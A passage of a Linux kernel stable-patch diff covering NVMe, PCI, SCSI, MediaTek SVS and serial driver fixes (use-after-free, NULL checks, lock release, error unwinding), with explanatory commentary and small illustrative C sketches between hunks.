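    /* Sketch: 512-byte sector units to device LBAs. lba_shift is log2
     * of the LBA size; 9 is log2(512).
     */
    u64 slba = blk_rq_pos(req) >> (ns->lba_shift - 9);     /* start LBA */
    u32 nlb  = blk_rq_sectors(req) >> (ns->lba_shift - 9); /* LBA count */
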
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 778f94e9a4453..100f774bc97fa 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3525,6 +3525,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x2646, 0x501E),   /* KINGSTON OM3PGP4xxxxQ OS21011 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
++	{ PCI_DEVICE(0x1f40, 0x1202),   /* Netac Technologies Co. NV3000 NVMe SSD */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1f40, 0x5236),   /* Netac Technologies Co. NV7000 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1e4B, 0x1001),   /* MAXIO MAP1001 */
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index 683b75a992b3d..3235baf7cc6b1 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -755,8 +755,10 @@ static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
+ 
+ void nvmet_req_complete(struct nvmet_req *req, u16 status)
+ {
++	struct nvmet_sq *sq = req->sq;
++
+ 	__nvmet_req_complete(req, status);
+-	percpu_ref_put(&req->sq->ref);
++	percpu_ref_put(&sq->ref);
+ }
+ EXPORT_SYMBOL_GPL(nvmet_req_complete);
+ 
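
The nvmet fix caches req->sq in a local before __nvmet_req_complete(), because
completing the request may free it, which would make the subsequent
percpu_ref_put() on req->sq a use-after-free. The bug class in miniature, as a
sketch with hypothetical names:

    /* Sketch of the hazard: 'obj' may be freed by complete(), so any
     * field needed afterwards must be loaded into a local first.
     */
    struct ref *r = obj->ref;	/* load before the object can die */

    complete(obj);			/* may free obj */
    ref_put(r);			/* safe: does not touch obj */
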
+diff --git a/drivers/pci/bus.c b/drivers/pci/bus.c
+index 3cef835b375fd..feafa378bf8ea 100644
+--- a/drivers/pci/bus.c
++++ b/drivers/pci/bus.c
+@@ -76,6 +76,27 @@ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n)
+ }
+ EXPORT_SYMBOL_GPL(pci_bus_resource_n);
+ 
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res)
++{
++	struct pci_bus_resource *bus_res, *tmp;
++	int i;
++
++	for (i = 0; i < PCI_BRIDGE_RESOURCE_NUM; i++) {
++		if (bus->resource[i] == res) {
++			bus->resource[i] = NULL;
++			return;
++		}
++	}
++
++	list_for_each_entry_safe(bus_res, tmp, &bus->resources, list) {
++		if (bus_res->res == res) {
++			list_del(&bus_res->list);
++			kfree(bus_res);
++			return;
++		}
++	}
++}
++
+ void pci_bus_remove_resources(struct pci_bus *bus)
+ {
+ 	int i;
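
The new pci_bus_remove_resource() handles both storage forms a bus resource can
take: one of the fixed bus->resource[] slots, or a pci_bus_resource entry on the
bus->resources list. A hypothetical caller, sketched for a host-bridge teardown
path ('bridge_window' is an assumption, not an existing symbol):

    /* Sketch: drop a window from the root bus before releasing it. */
    pci_bus_remove_resource(bus, bridge_window);
    release_resource(bridge_window);
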
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 85e66574ec414..45a2fd6584d16 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -341,9 +341,6 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
+-	/* In case scsi_remove_host() has not been called. */
+-	scsi_proc_hostdir_rm(shost->hostt);
+-
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+ 	rcu_barrier();
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index 8a438f248a820..de6914d57402c 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -903,6 +903,7 @@ struct scmd_priv {
+  * @admin_reply_ephase:Admin reply queue expected phase
+  * @admin_reply_base: Admin reply queue base virtual address
+  * @admin_reply_dma: Admin reply queue base dma address
++ * @admin_reply_q_in_use: set while the queue is being handled by poll/ISR
+  * @ready_timeout: Controller ready timeout
+  * @intr_info: Interrupt cookie pointer
+  * @intr_info_count: Number of interrupt cookies
+@@ -1056,6 +1057,7 @@ struct mpi3mr_ioc {
+ 	u8 admin_reply_ephase;
+ 	void *admin_reply_base;
+ 	dma_addr_t admin_reply_dma;
++	atomic_t admin_reply_q_in_use;
+ 
+ 	u32 ready_timeout;
+ 
+@@ -1391,4 +1393,7 @@ void mpi3mr_add_event_wait_for_device_refresh(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_drv_cmds(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_cmds_for_unrecovered_controller(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_free_enclosure_list(struct mpi3mr_ioc *mrioc);
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc);
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++	struct mpi3mr_sas_node *sas_expander);
+ #endif /*MPI3MR_H_INCLUDED*/
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 1e4467ea8472a..74fa7f90399e3 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -415,7 +415,7 @@ out:
+ 		    le64_to_cpu(scsi_reply->sense_data_buffer_address));
+ }
+ 
+-static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ {
+ 	u32 exp_phase = mrioc->admin_reply_ephase;
+ 	u32 admin_reply_ci = mrioc->admin_reply_ci;
+@@ -423,12 +423,17 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	u64 reply_dma = 0;
+ 	struct mpi3_default_reply_descriptor *reply_desc;
+ 
++	if (!atomic_add_unless(&mrioc->admin_reply_q_in_use, 1, 1))
++		return 0;
++
+ 	reply_desc = (struct mpi3_default_reply_descriptor *)mrioc->admin_reply_base +
+ 	    admin_reply_ci;
+ 
+ 	if ((le16_to_cpu(reply_desc->reply_flags) &
+-	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase)
++	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase) {
++		atomic_dec(&mrioc->admin_reply_q_in_use);
+ 		return 0;
++	}
+ 
+ 	do {
+ 		if (mrioc->unrecoverable)
+@@ -454,6 +459,7 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	writel(admin_reply_ci, &mrioc->sysif_regs->admin_reply_queue_ci);
+ 	mrioc->admin_reply_ci = admin_reply_ci;
+ 	mrioc->admin_reply_ephase = exp_phase;
++	atomic_dec(&mrioc->admin_reply_q_in_use);
+ 
+ 	return num_admin_replies;
+ }
+@@ -2605,6 +2611,7 @@ static int mpi3mr_setup_admin_qpair(struct mpi3mr_ioc *mrioc)
+ 	mrioc->admin_reply_ci = 0;
+ 	mrioc->admin_reply_ephase = 1;
+ 	mrioc->admin_reply_base = NULL;
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (!mrioc->admin_req_base) {
+ 		mrioc->admin_req_base = dma_alloc_coherent(&mrioc->pdev->dev,
+@@ -3814,27 +3821,34 @@ retry_init:
+ 
+ 	mpi3mr_print_ioc_info(mrioc);
+ 
+-	dprint_init(mrioc, "allocating config page buffers\n");
+-	mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
+-	    MPI3MR_DEFAULT_CFG_PAGE_SZ, &mrioc->cfg_page_dma, GFP_KERNEL);
+-	if (!mrioc->cfg_page)
+-		goto out_failed_noretry;
+-
+-	mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++	if (!mrioc->cfg_page) {
++		dprint_init(mrioc, "allocating config page buffers\n");
++		mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++		mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
++		    mrioc->cfg_page_sz, &mrioc->cfg_page_dma, GFP_KERNEL);
++		if (!mrioc->cfg_page) {
++			retval = -1;
++			goto out_failed_noretry;
++		}
++	}
+ 
+-	retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc,
+-		    "%s :Failed to allocated reply sense buffers %d\n",
+-		    __func__, retval);
+-		goto out_failed_noretry;
++	if (!mrioc->init_cmds.reply) {
++		retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc,
++			    "%s :Failed to allocate reply sense buffers %d\n",
++			    __func__, retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+-	retval = mpi3mr_alloc_chain_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc, "Failed to allocated chain buffers %d\n",
+-		    retval);
+-		goto out_failed_noretry;
++	if (!mrioc->chain_sgl_list) {
++		retval = mpi3mr_alloc_chain_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc, "Failed to allocate chain buffers %d\n",
++			    retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_issue_iocinit(mrioc);
+@@ -3880,8 +3894,10 @@ retry_init:
+ 		dprint_init(mrioc, "allocating memory for throttle groups\n");
+ 		sz = sizeof(struct mpi3mr_throttle_group_info);
+ 		mrioc->throttle_groups = kcalloc(mrioc->num_io_throttle_group, sz, GFP_KERNEL);
+-		if (!mrioc->throttle_groups)
++		if (!mrioc->throttle_groups) {
++			retval = -1;
+ 			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_enable_events(mrioc);
+@@ -3901,6 +3917,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller initialization failed\n");
+ 	mpi3mr_issue_reset(mrioc, MPI3_SYSIF_HOST_DIAG_RESET_ACTION_DIAG_FAULT,
+@@ -4013,6 +4030,7 @@ retry_init:
+ 		ioc_err(mrioc,
+ 		    "cannot create minimum number of operational queues expected:%d created:%d\n",
+ 		    mrioc->shost->nr_hw_queues, mrioc->num_op_reply_q);
++		retval = -1;
+ 		goto out_failed_noretry;
+ 	}
+ 
+@@ -4079,6 +4097,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller %s is failed\n",
+ 	    (is_resume)?"resume":"re-initialization");
+@@ -4156,6 +4175,7 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		memset(mrioc->admin_req_base, 0, mrioc->admin_req_q_sz);
+ 	if (mrioc->admin_reply_base)
+ 		memset(mrioc->admin_reply_base, 0, mrioc->admin_reply_q_sz);
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (mrioc->init_cmds.reply) {
+ 		memset(mrioc->init_cmds.reply, 0, sizeof(*mrioc->init_cmds.reply));
+@@ -4351,13 +4371,20 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		    mrioc->admin_req_base, mrioc->admin_req_dma);
+ 		mrioc->admin_req_base = NULL;
+ 	}
+-
++	if (mrioc->cfg_page) {
++		dma_free_coherent(&mrioc->pdev->dev, mrioc->cfg_page_sz,
++		    mrioc->cfg_page, mrioc->cfg_page_dma);
++		mrioc->cfg_page = NULL;
++	}
+ 	if (mrioc->pel_seqnum_virt) {
+ 		dma_free_coherent(&mrioc->pdev->dev, mrioc->pel_seqnum_sz,
+ 		    mrioc->pel_seqnum_virt, mrioc->pel_seqnum_dma);
+ 		mrioc->pel_seqnum_virt = NULL;
+ 	}
+ 
++	kfree(mrioc->throttle_groups);
++	mrioc->throttle_groups = NULL;
++
+ 	kfree(mrioc->logdata_buf);
+ 	mrioc->logdata_buf = NULL;
+ 
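
The admin_reply_q_in_use counter added in the hunks above makes the admin reply queue single-consumer: atomic_add_unless(&v, 1, 1) increments only when the counter is not already 1, so a poller and the ISR cannot drain the queue concurrently, and every exit path (including the early phase-mismatch return) decrements the counter again. A hedged userspace analog of that try-enter guard, built on C11 stdatomic rather than the kernel's atomic_t:

/* Userspace analog of atomic_add_unless(&v, 1, 1) guarding a function
 * against concurrent entry. Illustrative only; not the kernel code. */
#include <stdatomic.h>
#include <stdio.h>

static atomic_int in_use;

/* Returns 1 if we took ownership, 0 if another context holds it. */
static int try_enter(void)
{
	int expected = 0;
	/* add 1 unless the value is already 1, like atomic_add_unless() */
	return atomic_compare_exchange_strong(&in_use, &expected, 1);
}

static void leave(void)
{
	atomic_fetch_sub(&in_use, 1);	/* counterpart of atomic_dec() */
}

static int process_reply_queue(void)
{
	if (!try_enter())
		return 0;	/* another context is already draining */
	/* ... drain reply descriptors here ... */
	leave();
	return 1;
}

int main(void)
{
	printf("first call processed: %d\n", process_reply_queue());
	return 0;
}
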
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 6eaeba41072cb..6d55698ea4d16 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -3720,6 +3720,7 @@ int mpi3mr_issue_tm(struct mpi3mr_ioc *mrioc, u8 tm_type,
+ 		mpi3mr_poll_pend_io_completions(mrioc);
+ 		mpi3mr_ioc_enable_intr(mrioc);
+ 		mpi3mr_poll_pend_io_completions(mrioc);
++		mpi3mr_process_admin_reply_q(mrioc);
+ 	}
+ 	switch (tm_type) {
+ 	case MPI3_SCSITASKMGMT_TASKTYPE_TARGET_RESET:
+@@ -5077,6 +5078,8 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	struct workqueue_struct	*wq;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev, *tgtdev_next;
++	struct mpi3mr_hba_port *port, *hba_port_next;
++	struct mpi3mr_sas_node *sas_expander, *sas_expander_next;
+ 
+ 	if (!shost)
+ 		return;
+@@ -5116,6 +5119,28 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	mpi3mr_free_mem(mrioc);
+ 	mpi3mr_cleanup_resources(mrioc);
+ 
++	spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	list_for_each_entry_safe_reverse(sas_expander, sas_expander_next,
++	    &mrioc->sas_expander_list, list) {
++		spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++		mpi3mr_expander_node_remove(mrioc, sas_expander);
++		spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	}
++	list_for_each_entry_safe(port, hba_port_next, &mrioc->hba_port_table_list, list) {
++		ioc_info(mrioc,
++		    "removing hba_port entry: %p port: %d from hba_port list\n",
++		    port, port->port_id);
++		list_del(&port->list);
++		kfree(port);
++	}
++	spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++
++	if (mrioc->sas_hba.num_phys) {
++		kfree(mrioc->sas_hba.phy);
++		mrioc->sas_hba.phy = NULL;
++		mrioc->sas_hba.num_phys = 0;
++	}
++
+ 	spin_lock(&mrioc_list_lock);
+ 	list_del(&mrioc->list);
+ 	spin_unlock(&mrioc_list_lock);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3b61815979dab..50263ba4f8428 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -9,9 +9,6 @@
+ 
+ #include "mpi3mr.h"
+ 
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+-	struct mpi3mr_sas_node *sas_expander);
+-
+ /**
+  * mpi3mr_post_transport_req - Issue transport requests and wait
+  * @mrioc: Adapter instance reference
+@@ -2163,7 +2160,7 @@ out_fail:
+  *
+  * Return nothing.
+  */
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+ 	struct mpi3mr_sas_node *sas_expander)
+ {
+ 	struct mpi3mr_sas_port *mr_sas_port, *next;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_transport.c b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+index e5ecd6ada6cdd..e8a4750f6ec47 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_transport.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+@@ -785,7 +785,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		goto out_fail;
+ 	}
+ 	port = sas_port_alloc_num(sas_node->parent_dev);
+-	if ((sas_port_add(port))) {
++	if (!port || (sas_port_add(port))) {
+ 		ioc_err(ioc, "failure at %s:%d/%s()!\n",
+ 			__FILE__, __LINE__, __func__);
+ 		goto out_fail;
+@@ -824,6 +824,12 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			    mpt3sas_port->remote_identify.sas_address;
+ 	}
+ 
++	if (!rphy) {
++		ioc_err(ioc, "failure at %s:%d/%s()!\n",
++			__FILE__, __LINE__, __func__);
++		goto out_delete_port;
++	}
++
+ 	rphy->identify = mpt3sas_port->remote_identify;
+ 
+ 	if ((sas_rphy_add(rphy))) {
+@@ -831,6 +837,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			__FILE__, __LINE__, __func__);
+ 		sas_rphy_free(rphy);
+ 		rphy = NULL;
++		goto out_delete_port;
+ 	}
+ 
+ 	if (mpt3sas_port->remote_identify.device_type == SAS_END_DEVICE) {
+@@ -857,7 +864,10 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		    rphy_to_expander_device(rphy), hba_port->port_id);
+ 	return mpt3sas_port;
+ 
+- out_fail:
++out_delete_port:
++	sas_port_delete(port);
++
++out_fail:
+ 	list_for_each_entry_safe(mpt3sas_phy, next, &mpt3sas_port->phy_list,
+ 	    port_siblings)
+ 		list_del(&mpt3sas_phy->port_siblings);
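
The mpt3sas hunk adds the missing NULL check after sas_port_alloc_num() and a new out_delete_port label so that failures after sas_port_add() unwind the port registration. A small sketch of that goto-ladder idiom, where each label undoes exactly the steps that succeeded (the step names below are invented for illustration):

/* Goto error-unwind ladder in the style of the mpt3sas fix: each
 * failure jumps to a label that undoes only what succeeded. */
#include <stdio.h>

static int step1_ok, step2_fails = 1;

static int step1(void) { step1_ok = 1; return 0; }
static void undo_step1(void) { step1_ok = 0; }
static int step2(void) { return step2_fails ? -1 : 0; }

static int setup(void)
{
	int rc;

	rc = step1();
	if (rc)
		goto out_fail;

	rc = step2();
	if (rc)
		goto out_undo_step1;	/* like the new out_delete_port */

	return 0;

out_undo_step1:
	undo_step1();
out_fail:
	return rc;
}

int main(void)
{
	printf("setup rc=%d, step1 left allocated: %d\n", setup(), step1_ok);
	return 0;
}
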
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index c59eac7a32f2a..24c4c92543599 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -326,6 +326,9 @@ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ 	unsigned char vpd_header[SCSI_VPD_HEADER_SIZE] __aligned(4);
+ 	int result;
+ 
++	if (sdev->no_vpd_size)
++		return SCSI_DEFAULT_VPD_LEN;
++
+ 	/*
+ 	 * Fetch the VPD page header to find out how big the page
+ 	 * is. This is done to prevent problems on legacy devices
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index c7080454aea99..bc9d280417f6a 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -134,7 +134,7 @@ static struct {
+ 	{"3PARdata", "VV", NULL, BLIST_REPORTLUN2},
+ 	{"ADAPTEC", "AACRAID", NULL, BLIST_FORCELUN},
+ 	{"ADAPTEC", "Adaptec 5400S", NULL, BLIST_FORCELUN},
+-	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES},
++	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES | BLIST_NO_VPD_SIZE},
+ 	{"AFT PRO", "-IX CF", "0.0>", BLIST_FORCELUN},
+ 	{"BELKIN", "USB 2 HS-CF", "1.95",  BLIST_FORCELUN | BLIST_INQUIRY_36},
+ 	{"BROWNIE", "1200U3P", NULL, BLIST_NOREPORTLUN},
+@@ -188,6 +188,7 @@ static struct {
+ 	{"HPE", "OPEN-", "*", BLIST_REPORTLUN2 | BLIST_TRY_VPD_PAGES},
+ 	{"IBM", "AuSaV1S2", NULL, BLIST_FORCELUN},
+ 	{"IBM", "ProFibre 4000R", "*", BLIST_SPARSELUN | BLIST_LARGELUN},
++	{"IBM", "2076", NULL, BLIST_NO_VPD_SIZE},
+ 	{"IBM", "2105", NULL, BLIST_RETRY_HWERROR},
+ 	{"iomega", "jaz 1GB", "J.86", BLIST_NOTQ | BLIST_NOLUN},
+ 	{"IOMEGA", "ZIP", NULL, BLIST_NOTQ | BLIST_NOLUN},
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index d149b218715e5..d12f2dcb4040a 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1056,6 +1056,9 @@ static int scsi_add_lun(struct scsi_device *sdev, unsigned char *inq_result,
+ 	else if (*bflags & BLIST_SKIP_VPD_PAGES)
+ 		sdev->skip_vpd_pages = 1;
+ 
++	if (*bflags & BLIST_NO_VPD_SIZE)
++		sdev->no_vpd_size = 1;
++
+ 	transport_configure_device(&sdev->sdev_gendev);
+ 
+ 	if (sdev->host->hostt->slave_configure) {
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index 00526fd37d7b8..e55fb16fdc5ac 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -138,6 +138,7 @@
+ 
+ static DEFINE_SPINLOCK(svs_lock);
+ 
++#ifdef CONFIG_DEBUG_FS
+ #define debug_fops_ro(name)						\
+ 	static int svs_##name##_debug_open(struct inode *inode,		\
+ 					   struct file *filp)		\
+@@ -170,6 +171,7 @@ static DEFINE_SPINLOCK(svs_lock);
+ 	}
+ 
+ #define svs_dentry_data(name)	{__stringify(name), &svs_##name##_debug_fops}
++#endif
+ 
+ /**
+  * enum svsb_phase - svs bank phase enumeration
+@@ -628,6 +630,7 @@ unlock_mutex:
+ 	return ret;
+ }
+ 
++#ifdef CONFIG_DEBUG_FS
+ static int svs_dump_debug_show(struct seq_file *m, void *p)
+ {
+ 	struct svs_platform *svsp = (struct svs_platform *)m->private;
+@@ -843,6 +846,7 @@ static int svs_create_debug_cmds(struct svs_platform *svsp)
+ 
+ 	return 0;
+ }
++#endif /* CONFIG_DEBUG_FS */
+ 
+ static u32 interpolate(u32 f0, u32 f1, u32 v0, u32 v1, u32 fx)
+ {
+@@ -2444,11 +2448,13 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_iounmap;
+ 	}
+ 
++#ifdef CONFIG_DEBUG_FS
+ 	ret = svs_create_debug_cmds(svsp);
+ 	if (ret) {
+ 		dev_err(svsp->dev, "svs create debug cmds fail: %d\n", ret);
+ 		goto svs_probe_iounmap;
+ 	}
++#endif
+ 
+ 	return 0;
+ 
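
The mtk-svs hunks compile the debugfs plumbing only under CONFIG_DEBUG_FS and wrap the probe-time call in the same guard. The patch guards the call site with #ifdef directly; an equivalent and common variant, sketched below with a made-up FEATURE_DEBUGFS switch, is to provide a static-inline stub so call sites stay unconditional:

/* Compile-time feature gating in the style of the mtk-svs change.
 * Build with -DFEATURE_DEBUGFS for the real helper; without it the
 * call site still compiles against a stub. FEATURE_DEBUGFS is a
 * made-up name for illustration. */
#include <stdio.h>

#ifdef FEATURE_DEBUGFS
static int create_debug_cmds(void)
{
	puts("debugfs entries created");
	return 0;
}
#else
static inline int create_debug_cmds(void) { return 0; }	/* stub */
#endif

int main(void)
{
	int ret = create_debug_cmds();

	printf("probe continues, ret=%d\n", ret);
	return 0;
}
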
+diff --git a/drivers/tty/serial/8250/8250_em.c b/drivers/tty/serial/8250/8250_em.c
+index f8e99995eee91..d94c3811a8f7a 100644
+--- a/drivers/tty/serial/8250/8250_em.c
++++ b/drivers/tty/serial/8250/8250_em.c
+@@ -106,8 +106,8 @@ static int serial8250_em_probe(struct platform_device *pdev)
+ 	memset(&up, 0, sizeof(up));
+ 	up.port.mapbase = regs->start;
+ 	up.port.irq = irq;
+-	up.port.type = PORT_UNKNOWN;
+-	up.port.flags = UPF_BOOT_AUTOCONF | UPF_FIXED_PORT | UPF_IOREMAP;
++	up.port.type = PORT_16750;
++	up.port.flags = UPF_FIXED_PORT | UPF_IOREMAP | UPF_FIXED_TYPE;
+ 	up.port.dev = &pdev->dev;
+ 	up.port.private_data = priv;
+ 
+diff --git a/drivers/tty/serial/8250/8250_fsl.c b/drivers/tty/serial/8250/8250_fsl.c
+index 8aad15622a2e5..8adfaa183f778 100644
+--- a/drivers/tty/serial/8250/8250_fsl.c
++++ b/drivers/tty/serial/8250/8250_fsl.c
+@@ -34,7 +34,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 
+ 	iir = port->serial_in(port, UART_IIR);
+ 	if (iir & UART_IIR_NO_INT) {
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 0;
+ 	}
+ 
+@@ -42,7 +42,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 	if (unlikely(up->lsr_saved_flags & UART_LSR_BI)) {
+ 		up->lsr_saved_flags &= ~UART_LSR_BI;
+ 		port->serial_in(port, UART_RX);
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 1;
+ 	}
+ 
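
The 8250_fsl fix replaces two bare spin_unlock() calls on early-return paths with spin_unlock_irqrestore(), so the interrupt state saved by the matching spin_lock_irqsave() is actually restored. A userspace sketch of the invariant, with a simulated interrupt flag standing in for the CPU state (no real IRQ masking happens here):

/* A lock taken with spin_lock_irqsave() must be released on *every*
 * path with spin_unlock_irqrestore(), or the saved interrupt state is
 * lost. Userspace sketch with a simulated irq flag. */
#include <stdio.h>

static int irqs_enabled = 1;	/* simulated CPU interrupt state */
static int lock_held;

static void lock_irqsave(unsigned long *flags)
{
	*flags = irqs_enabled;	/* remember the caller's state */
	irqs_enabled = 0;
	lock_held = 1;
}

static void unlock_irqrestore(unsigned long flags)
{
	lock_held = 0;
	irqs_enabled = (int)flags;	/* restore exactly what was saved */
}

static int handle_irq(int no_interrupt)
{
	unsigned long flags;

	lock_irqsave(&flags);
	if (no_interrupt) {
		/* the bug was a plain unlock here, losing `flags` */
		unlock_irqrestore(flags);
		return 0;
	}
	/* ... service the interrupt ... */
	unlock_irqrestore(flags);
	return 1;
}

int main(void)
{
	handle_irq(1);
	printf("irqs_enabled=%d lock_held=%d\n", irqs_enabled, lock_held);
	return 0;
}
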
+diff --git a/drivers/tty/serial/8250/Kconfig b/drivers/tty/serial/8250/Kconfig
+index b0f62345bc846..583a340f99345 100644
+--- a/drivers/tty/serial/8250/Kconfig
++++ b/drivers/tty/serial/8250/Kconfig
+@@ -253,8 +253,9 @@ config SERIAL_8250_ASPEED_VUART
+ 	tristate "Aspeed Virtual UART"
+ 	depends on SERIAL_8250
+ 	depends on OF
+-	depends on REGMAP && MFD_SYSCON
++	depends on MFD_SYSCON
+ 	depends on ARCH_ASPEED || COMPILE_TEST
++	select REGMAP
+ 	help
+ 	  If you want to use the virtual UART (VUART) device on Aspeed
+ 	  BMC platforms, enable this option. This enables the 16550A-
+diff --git a/drivers/tty/serial/Kconfig b/drivers/tty/serial/Kconfig
+index 434f83168546c..4fce15296f311 100644
+--- a/drivers/tty/serial/Kconfig
++++ b/drivers/tty/serial/Kconfig
+@@ -1311,7 +1311,7 @@ config SERIAL_FSL_LPUART
+ 
+ config SERIAL_FSL_LPUART_CONSOLE
+ 	bool "Console on Freescale lpuart serial port"
+-	depends on SERIAL_FSL_LPUART
++	depends on SERIAL_FSL_LPUART=y
+ 	select SERIAL_CORE_CONSOLE
+ 	select SERIAL_EARLYCON
+ 	help
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index f9d667ce1619e..c51883f34ac2b 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -2184,9 +2184,15 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	/* update the per-port timeout */
+ 	uart_update_timeout(port, termios->c_cflag, baud);
+ 
+-	/* wait transmit engin complete */
